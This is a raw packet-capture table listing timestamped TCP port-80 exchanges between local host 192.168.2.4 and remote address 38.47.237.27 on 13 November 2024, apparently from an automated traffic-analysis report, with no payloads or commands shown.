                                                                                      Nov 13, 2024 09:28:56.905841112 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.905881882 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.905920029 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.905993938 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906011105 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906065941 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.906162024 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906198025 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.906205893 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.906215906 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906346083 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906394958 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.906404018 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906419039 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.906464100 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.910883904 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.910953999 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.910972118 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.911006927 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.911048889 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.911087036 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.938030958 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.938045025 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.938172102 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.024629116 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024831057 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024847031 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024862051 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024878025 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024919987 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.024956942 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025000095 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025058031 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025058031 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025058031 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025058031 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025156021 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025295019 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025310040 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025348902 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025388002 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025441885 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025623083 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025722027 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025738955 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025772095 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.025871038 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025887966 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.025924921 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.026329994 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026385069 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.026405096 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026422024 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026468992 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.026567936 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026585102 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.026631117 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.065869093 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.065886021 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.065901995 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.066030025 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.066046000 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.066092014 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.066092968 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.113087893 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.143372059 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143404961 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143423080 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143436909 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143452883 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143469095 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143485069 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143768072 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143798113 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143834114 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143855095 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143873930 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.143938065 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144088984 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144114971 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144145966 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144252062 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144320965 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144336939 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144370079 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144370079 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144510031 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144568920 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144577980 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144596100 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144654036 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.144761086 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144778013 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144793987 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.144833088 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145009041 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145025015 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145064116 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145375967 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145445108 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145461082 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145478010 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145530939 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145654917 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145672083 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145688057 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145726919 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.145900011 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145916939 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.145955086 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146280050 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146337032 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146352053 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146368980 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146425009 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146545887 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146563053 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146578074 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146594048 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.146620989 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146652937 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146838903 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175235987 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175254107 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175270081 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175354958 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175370932 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175385952 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175614119 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.175615072 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.184251070 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184325933 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.184416056 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184429884 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184444904 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184461117 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184475899 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184480906 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.184514999 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.238044977 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.261724949 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261739969 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261754990 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261779070 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261791945 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261806965 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261948109 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.261949062 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.261949062 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.261974096 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262053013 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262068033 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262197018 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262212038 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262259960 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262259960 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262347937 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262363911 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262423992 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262485981 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262501001 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262542009 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262681007 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262696028 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262737036 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262834072 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262850046 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262890100 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262969971 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263024092 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.263046980 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263062954 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263077974 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263093948 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263115883 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.263148069 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.263405085 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263417959 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263473034 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.263550043 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263566971 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263581991 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263617039 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.263822079 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263838053 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263851881 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263865948 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263879061 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.263881922 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263897896 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263901949 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.263915062 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.263943911 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.263978004 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.264391899 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264466047 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264520884 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.264564991 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264580011 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264595032 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264631987 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.264849901 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264872074 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264887094 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264902115 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264905930 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.264919043 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264930010 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.264934063 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264945030 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.264983892 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.265013933 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.265434980 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265451908 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265510082 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.265656948 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265671968 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265686989 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265727043 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.265939951 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265954971 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265969992 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265985012 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.265995026 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.266000986 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.266017914 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.266020060 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.266060114 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.266086102 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.753952026 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:58.776102066 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:58.781359911 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:58.781610966 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:58.799527884 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:58.805641890 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451735020 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451761961 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451769114 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451781034 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451860905 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451867104 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451941967 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451961040 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.451972961 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.452073097 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.452166080 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.452316999 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.457120895 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.457273960 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.457290888 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.457308054 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.457326889 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.457360029 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.484185934 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.484214067 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.484456062 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.570593119 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570610046 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570626020 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570641041 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570702076 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.570727110 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570792913 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.570832014 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570887089 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.570931911 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570949078 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570962906 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.570995092 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.571584940 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.571636915 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.571960926 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.571978092 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.572022915 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.572073936 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.572089911 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.572103977 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.572138071 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.572658062 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.572709084 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.572742939 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.572758913 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.572807074 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.572889090 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.573477030 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.573524952 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.602910042 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.602941990 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.602957010 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.602972031 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.602987051 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.603126049 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.688926935 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.688955069 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.688970089 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.689022064 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.689088106 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.689109087 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.689145088 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.689233065 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.689281940 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.689385891 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.689440966 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.689455986 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.689471960 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.689487934 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.689522982 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.689718008 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690048933 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690083027 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690099001 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690099955 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.690145969 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.690432072 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690448046 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690463066 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690491915 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.690555096 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690598965 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.690885067 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690922976 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690939903 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.690967083 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.691063881 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.691107988 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.691108942 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.691124916 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.691164970 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.691785097 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.691819906 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.691837072 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.691870928 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.691937923 CET805911738.47.237.27192.168.2.4
